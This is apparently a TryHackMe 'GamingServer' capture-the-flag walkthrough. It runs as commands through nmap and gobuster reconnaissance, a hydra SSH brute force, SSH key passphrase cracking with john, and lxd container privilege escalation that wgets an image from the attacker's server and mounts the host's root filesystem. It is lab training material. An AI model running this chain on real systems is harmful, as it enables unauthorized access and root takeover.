> For the complete documentation index, see [llms.txt](https://jeffgthompsons-organization.gitbook.io/red-team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/gamingserver.md).

# GamingServer

**Room Link:** <https://tryhackme.com/room/gamingserver>

### Initial Scan

**Kali**

<pre><code><strong>nmap -A $VICTIM
</strong></code></pre>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FuWGU48gjNpJ79yMhQ2ZF%2Fimage.png?alt=media&amp;token=43dd858b-59a4-4192-94d4-c9466afdf1de" alt=""><figcaption></figcaption></figure>

### Scan all ports

No other ports found

**Kali**

<pre><code><strong>nmap -sV -sT -O -p 1-65535 $VICTIM
</strong></code></pre>

### TCP/80 - HTTP

**Kali**

```
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F4q2Iw74XXAOvyTGxd9oT%2Fimage.png?alt=media&amp;token=f34afb7f-a8f3-45b1-b870-96bbf001f71d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Ft6uEcCbFQ46ZDwnf0ydG%2Fimage.png?alt=media&amp;token=e6056a73-06a8-4733-989f-0013267b7bf2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F7WrtB4TGfIdTs2LGLrHb%2Fimage.png?alt=media&amp;token=6c63abd2-eae7-4ded-b18f-6265a334ebd1" alt=""><figcaption></figcaption></figure>

### SSH port 22

Tried bruteforcing ssh with johns username and the dictionary file we found but it didn't work

**Kali**

```
hydra -l john -P dict.lst ssh://$VICTIM
```

### TCP/80 - HTTP

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Fy4N8nIw5ndtPi6rlLtvc%2Fimage.png?alt=media&amp;token=8ba9b29c-2d32-49ba-a528-3500b635de31" alt=""><figcaption></figcaption></figure>

### SSH port 22

After finding the key I bruteforced that with the dictionary list found

**Kali**

```
chmod 700 secretKey
/opt/john/ssh2john.py secretKey > id_john.txt
john --wordlist=/root/dict.lst id_john.txt 
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FEW8c8lPriHzhI8zn8dHA%2Fimage.png?alt=media&amp;token=991933f6-556c-43a2-85b6-d7d0870d3cbe" alt=""><figcaption></figcaption></figure>

**Kali**

```
ssh -i secretKey john@$VICTIM
Password: letmein
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FXyiN52ZiI1ffO9H7czzw%2Fimage.png?alt=media&amp;token=81f6df42-7387-4513-a6a7-c5f7257699c0" alt=""><figcaption></figcaption></figure>

### Privilege Escalation&#x20;

Followed this link on lxd privilege escalation&#x20;

**Link:** <https://www.hackingarticles.in/lxd-privilege-escalation/>

**Victim**

```
id
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Fd2SFjdyMZztvcofP3hu9%2Fimage.png?alt=media&amp;token=767e00c5-0359-428e-a4c9-8b6b142eece3" alt=""><figcaption></figcaption></figure>

**Kali**

```
git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python2 -m SimpleHTTPServer 81
```

**Victim**

```
cd /tmp
wget http://10.10.73.204:81/alpine-v3.18-x86_64-20230712_1453.tar.gz
lxc image import ./alpine-v3.18-x86_64-20230712_1453.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F7g1woSK7ZqHEkBnzFrGW%2Fimage.png?alt=media&amp;token=e4564702-e533-4001-955e-14e1fe4266cf" alt=""><figcaption></figcaption></figure>
